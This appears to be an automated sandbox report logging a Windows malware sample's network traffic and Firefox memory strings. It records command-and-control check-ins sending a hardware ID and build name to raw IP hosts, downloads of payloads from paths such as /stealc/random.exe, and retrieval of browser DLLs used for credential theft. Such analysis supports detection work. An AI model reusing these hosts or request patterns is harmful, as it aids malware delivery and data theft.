Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 39 37 46 39 41 35 35 33 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="hwid"5897F9A553C62507286958------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="build"sila------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View IP Address: 185.215.113.19 185.215.113.19
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0031BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 7_2_0031BD60
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://pubads.g.doubleclick.net/gampad/*xml_vmap2**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://*.adsafeprotected.com/*/unit/**://*.adsafeprotected.com/jsvid?**://*.adsafeprotected.com/services/pub**://trends.google.com/trends/embed**://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etpexecuteIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php*@mozilla.org/binaryoutputstream;1 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.gstatic.com/firebasejs/*/firebase-messaging.js**://id.rambler.ru/rambler-id-helper/auth_events.jsTerminatoryTelemetry: Waiting to submit telemetry equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder 
hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2624675381.00000238E7390000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /www.youtube.com/accountMOZ_CRAx equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3353317296.00000286329B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000003.2579191427.000001CBE797F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2578648250.000001CBE796C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2581107426.000001CBE7980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program 
Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program 
Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program 
Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsmmoD equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643811635.000001F414174000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 
(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2817649774.0000025C6DB07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2817649774.0000025C6DB00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Temp\1000017001\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: FileUtils_openSafeFileOutputStreamFileUtils_closeSafeFileOutputStream*://www.everestjs.net/static/st.v3.js**://c.amazon-adsystem.com/aax2/apstag.jswebcompat-reporter%40mozilla.org:1.5.1@mozilla.org/addons/addon-manager-startup;1*://pub.doubleverify.com/signals/pub.js**://auth.9c9media.ca/auth/main.jswebcompat-reporter@mozilla.org.xpi*://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svg*://static.chartbeat.com/js/chartbeat.js*://libs.coremetrics.com/eluminate.jsresource://gre/modules/FileUtils.sys.mjs*://*.imgur.com/js/vendor.*.bundle.js@mozilla.org/network/file-output-stream;1FileUtils_closeAtomicFileOutputStream*://track.adform.net/serving/scripts/trackpoint/*://static.criteo.net/js/ld/publishertag.js*://web-assets.toggl.com/app/assets/scripts/*.js*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/sdk.js*resource://gre/modules/addons/XPIProvider.jsm*://www.google-analytics.com/analytics.js**://www.google-analytics.com/plugins/ua/ec.js*://s0.2mdn.net/instream/html5/ima3.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://cdn.adsafeprotected.com/iasPET.1.js*://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://www.googletagmanager.com/gtm.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://static.adsafeprotected.com/iasPET.1.js*://*.moatads.com/*/moatheader.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/advancedLinkTracking.js*://www.google-analytics.com/gtm/js**://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsTelemetrySession::onEnvironmentChange equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8F6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: HDAUDIO\FUNC_01&VEN_15AD&DEV_1975&SUBSYS_15AD1975&REV_1001\4&32275da5&0&0001_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORT equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E745F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account' equals www.youtube.com (Youtube)
